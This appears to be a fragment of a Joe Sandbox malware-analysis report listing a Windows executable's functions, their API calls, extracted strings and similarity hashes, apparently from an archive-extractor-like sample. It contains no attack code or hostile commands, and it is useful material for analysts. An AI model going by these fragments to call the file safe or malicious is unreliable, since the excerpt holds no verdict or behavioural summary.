                                                                                                              • API String ID: 749574446-0
                                                                                                              • Opcode ID: e36a62412a2466f53346ad350a926b74b340dd71a09bc5913daa9c739a1a99f8
                                                                                                              • Instruction ID: cb5f48fa717e4a7e9a0ea42e5ee9cfc1544f4284d3f7d976d8f7a91b2c445020
                                                                                                              • Opcode Fuzzy Hash: e36a62412a2466f53346ad350a926b74b340dd71a09bc5913daa9c739a1a99f8
                                                                                                              • Instruction Fuzzy Hash: DFB011300E208ACA8F002B30EC088203A20EA2230A30082B0B00AC80A2CB22C002AA88
                                                                                                              APIs
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0045927A,00482120,00000000,00483122,00000006), ref: 00459027
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectory
                                                                                                              • String ID:
                                                                                                              • API String ID: 1611563598-0
                                                                                                              • Opcode ID: 0fc47f0eda33a42ed44c23dddeb5c368a85dab06570e63332533f9a7a0fd8ce9
                                                                                                              • Instruction ID: ec492fb929ae15c3de9d97f979fd7eb5f58bc948644e00252835f9b0b66a3380
                                                                                                              • Opcode Fuzzy Hash: 0fc47f0eda33a42ed44c23dddeb5c368a85dab06570e63332533f9a7a0fd8ce9
                                                                                                              • Instruction Fuzzy Hash: 72A0123019510686CA000B30CC09C15B7509760702F0086307046C00A0CB318850E504
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00449473), ref: 004494BE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2962429428-0
                                                                                                              • Opcode ID: 760ad3e43440e139be97585b9acf1668c2a5fc17a4017c3c35327882e4a27838
                                                                                                              • Instruction ID: 06fb94a0515ebead9bbec90d268c6a94f4858ca21205ad48c761ff7f7ae972bc
                                                                                                              • Opcode Fuzzy Hash: 760ad3e43440e139be97585b9acf1668c2a5fc17a4017c3c35327882e4a27838
                                                                                                              • Instruction Fuzzy Hash: FFF0B470546B448EFB308A24D54879373E85B11736F04871FD0EA435D0D369684AAB15
                                                                                                              APIs
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0045A5C8
                                                                                                              • EndDialog.USER32(?,00000006), ref: 0045A5DB
                                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 0045A5F7
                                                                                                              • SetFocus.USER32(00000000), ref: 0045A5FE
                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0045A63E
                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0045A671
                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0045A687
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0045A6A5
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0045A6B5
                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0045A6D2
                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0045A6F0
                                                                                                                • Part of subcall function 0044D142: LoadStringW.USER32(?,?,00000200,?), ref: 0044D187
                                                                                                                • Part of subcall function 0044D142: LoadStringW.USER32(?,?,00000200,?), ref: 0044D19D
                                                                                                              • _swprintf.LIBCMT ref: 0045A720
                                                                                                                • Part of subcall function 00443F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00443F6E
                                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0045A733
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0045A736
                                                                                                              • _swprintf.LIBCMT ref: 0045A791
                                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0045A7A4
                                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0045A7BA
                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0045A7DA
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0045A7EA
                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0045A804
                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0045A81C
                                                                                                              • _swprintf.LIBCMT ref: 0045A84D
                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0045A860
                                                                                                              • _swprintf.LIBCMT ref: 0045A8B0
                                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0045A8C3
                                                                                                                • Part of subcall function 0045932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00459355
                                                                                                                • Part of subcall function 0045932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0047A154,?,?), ref: 004593A4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                              • API String ID: 3227067027-1840816070
                                                                                                              • Opcode ID: 95df411323f751f00e31df950e5a714aef18204dae57fcb18dbb73b6e85958ab
                                                                                                              • Instruction ID: 92ebca60b0ca5d1221aa5180f5593a3692c0c28dd23a683f5968d03f15dea69b
                                                                                                              • Opcode Fuzzy Hash: 95df411323f751f00e31df950e5a714aef18204dae57fcb18dbb73b6e85958ab
                                                                                                              • Instruction Fuzzy Hash: AD91E972544308BFE231DBA0CC49FFB77ACEB49705F00492AFA49D6181D775AA09876B
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00447075
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004471D5
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004471E5
                                                                                                                • Part of subcall function 00447A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00447AAC
                                                                                                                • Part of subcall function 00447A9D: GetLastError.KERNEL32 ref: 00447AF2
                                                                                                                • Part of subcall function 00447A9D: CloseHandle.KERNEL32(?), ref: 00447B01
                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004471F0
                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004472FE
                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0044732A
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0044733C
                                                                                                              • GetLastError.KERNEL32(00000015,00000000,?), ref: 0044734C
                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00447398
                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004473C0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                              • API String ID: 3935142422-3508440684
                                                                                                              • Opcode ID: dd2980530663570fe1678a2ab3039b77ff04093012b5958d6379ed9d3756d331
                                                                                                              • Instruction ID: 1705fcc621cf09939e74fdfd143d26505c2ef0357b92fffd05fe7cf77af88922
                                                                                                              • Opcode Fuzzy Hash: dd2980530663570fe1678a2ab3039b77ff04093012b5958d6379ed9d3756d331
                                                                                                              • Instruction Fuzzy Hash: EFB1C071904258AFEB20DF64DC81BEF77B8AF04304F1044AEF919E7242D778AA45CB69
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prolog_memcmp
                                                                                                              • String ID: CMT$h%u$hc%u
                                                                                                              • API String ID: 3004599000-3282847064
                                                                                                              • Opcode ID: 5f949bac1330f628d479ae0c35ccaffa9d763721b97cd4dded993a6a0a7e9076
                                                                                                              • Instruction ID: b90cdd306badcc281cc53cda2fcab1be5197a30407f969a64ec9b303b3a6be96
                                                                                                              • Opcode Fuzzy Hash: 5f949bac1330f628d479ae0c35ccaffa9d763721b97cd4dded993a6a0a7e9076
                                                                                                              • Instruction Fuzzy Hash: C332C4715002849FFF14DF65C886AEA37A5AF15705F08447FFD8ACB282DB789A48CB64
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __floor_pentium4
                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                              • Opcode ID: 8c87faca178a537718b6b11ffd6e3ee81467246f244b293c4e27225d0b4b7d0c
                                                                                                              • Instruction ID: bb48f3f2db02395147551d1933ae8ae81fcf1cc99646ad11fb89286d5f982f65
                                                                                                              • Opcode Fuzzy Hash: 8c87faca178a537718b6b11ffd6e3ee81467246f244b293c4e27225d0b4b7d0c
                                                                                                              • Instruction Fuzzy Hash: B0C26B71E046288FDB25CE28DD407EAB7B5EB84305F1441EBD84DE7241E778AE918F86
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00442775
                                                                                                              • _strlen.LIBCMT ref: 00442CFF
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00442E56
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                              • String ID: CMT
                                                                                                              • API String ID: 3741668355-2756464174
                                                                                                              • Opcode ID: b09cb7754f70067b05c58bfe58ca71e781029a5e103a367313b759f261758808
                                                                                                              • Instruction ID: 4e93e26689c10c7f5d97848048e22f809db553848e325d9f3630ce04f1a7be7a
                                                                                                              • Opcode Fuzzy Hash: b09cb7754f70067b05c58bfe58ca71e781029a5e103a367313b759f261758808
                                                                                                              • Instruction Fuzzy Hash: D762E4715002848FEF18DF65C9856EA3BE1AF54304F49457FFC8A8B282DBB89949CB58
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00465C4B
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00465C55
                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00465C62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3906539128-0
                                                                                                              • Opcode ID: bc4f27c8fff8511f2a006c3a6d08cb9cefc61adb4b3213772cb376a3f015548f
                                                                                                              • Instruction ID: 71d8d05a83e6d6e97e9dc03519efc2d2cfc2467e96bd20f924f0cfc4c70bcccf
                                                                                                              • Opcode Fuzzy Hash: bc4f27c8fff8511f2a006c3a6d08cb9cefc61adb4b3213772cb376a3f015548f
                                                                                                              • Instruction Fuzzy Hash: E831D374D012289BCB21DF65D88979DBBB8FF18311F5042EAE80CA7251E7749BC58F49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                              • Instruction ID: bd11970b214cae1a637e92df32ea2b15414ff7fe03903d1151a6edaf7de6dd38
                                                                                                              • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                                              • Instruction Fuzzy Hash: 92026C71E006199BDF14CFA9C8806AEB7F1EF48314F25826AD815F7380E735AE518F86
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00459355
                                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0047A154,?,?), ref: 004593A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                                              • String ID:
                                                                                                              • API String ID: 2169056816-0
                                                                                                              • Opcode ID: 4c250849b7bae166013f6a6e7f2519771979958eacdda580ed0221cc2ef97ea5
                                                                                                              • Instruction ID: 4ccb2dbfc565e5d149f3849d30567445fcaa95909093e962be59cf76778bff67
                                                                                                              • Opcode Fuzzy Hash: 4c250849b7bae166013f6a6e7f2519771979958eacdda580ed0221cc2ef97ea5
                                                                                                              • Instruction Fuzzy Hash: A8019E75100308AADB108F64DC05FAB7BBCEF4A310F404436BA08E7160D7749964CBAA
                                                                                                              APIs
                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0046E8CF,?,?,00000008,?,?,0046E56F,00000000), ref: 0046EB01
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionRaise
                                                                                                              • String ID:
                                                                                                              • API String ID: 3997070919-0
                                                                                                              • Opcode ID: 4a91ab5553746358c8ed7fe9ed20f50dddb45e4e829cff8ee81b13bb3521af5f
                                                                                                              • Instruction ID: 14e69a8a0ae514c9408f014e79cd794d13ddbdad875e6484c4f1f93c21176049
                                                                                                              • Opcode Fuzzy Hash: 4a91ab5553746358c8ed7fe9ed20f50dddb45e4e829cff8ee81b13bb3521af5f
                                                                                                              • Instruction Fuzzy Hash: F7B17B35210608CFD715CF29C48AB657BE0FF05364F258659E89ACF3A1D339E982CB46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 0-4203073231
                                                                                                              • Opcode ID: 650f7944b63f2b1907b6feeff7ce10399f8860bc6ec6263f1152c87833e1067c
                                                                                                              • Instruction ID: 54222f19810825f23f34163ddbb3931e3b312d36bc4bbe980da6e0ae97754729
                                                                                                              • Opcode Fuzzy Hash: 650f7944b63f2b1907b6feeff7ce10399f8860bc6ec6263f1152c87833e1067c
                                                                                                              • Instruction Fuzzy Hash: 4DF1C4B2A083418FD748CF29D880A1AFBE1BFC8208F15892EF998D7715D734E9558F56
                                                                                                              APIs
                                                                                                              • GetVersionExW.KERNEL32(?), ref: 0044A905
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889659487-0
                                                                                                              • Opcode ID: 1cecac97d84614fcf731a4af9dd0dc914b4557bcb6bf88130f219ab58bff105f
                                                                                                              • Instruction ID: ae371c084699bc237b4eb751a899d0a5b2885dc2ab55786c42cf1ee9874bc45e
                                                                                                              • Opcode Fuzzy Hash: 1cecac97d84614fcf731a4af9dd0dc914b4557bcb6bf88130f219ab58bff105f
                                                                                                              • Instruction Fuzzy Hash: 80F030F49042088BDB28CF18EC826E973B5F759324F2146A9E91D63390D774ADD18F5A
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0045D604), ref: 0045DBC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: c4e9d9e96e2902fe7668d4bd35cfadddbc3dfd6a141394c05181435104614967
                                                                                                              • Instruction ID: 94303bcad51b9ca70512ed28f83e13ed719af84f005dcc0258927bbe1a41934c
                                                                                                              • Opcode Fuzzy Hash: c4e9d9e96e2902fe7668d4bd35cfadddbc3dfd6a141394c05181435104614967
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8G
                                                                                                              • API String ID: 0-2931747039
                                                                                                              • Opcode ID: 0228f0956fa394bebc059cbbc8f0b9ce5eccdcdbff22c5c503ff07f6cc00c2f8
                                                                                                              • Instruction ID: 4f68610d6ba4ce0dd22cd39ebef85cf2f7d56d404c4fac426ac876920f512c35
                                                                                                              • Opcode Fuzzy Hash: 0228f0956fa394bebc059cbbc8f0b9ce5eccdcdbff22c5c503ff07f6cc00c2f8
                                                                                                              • Instruction Fuzzy Hash: 0B51E075D083954EE712CF2AC18046EBFE1AEDA314F49489EE4D54B252C234DA8ACB5B
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
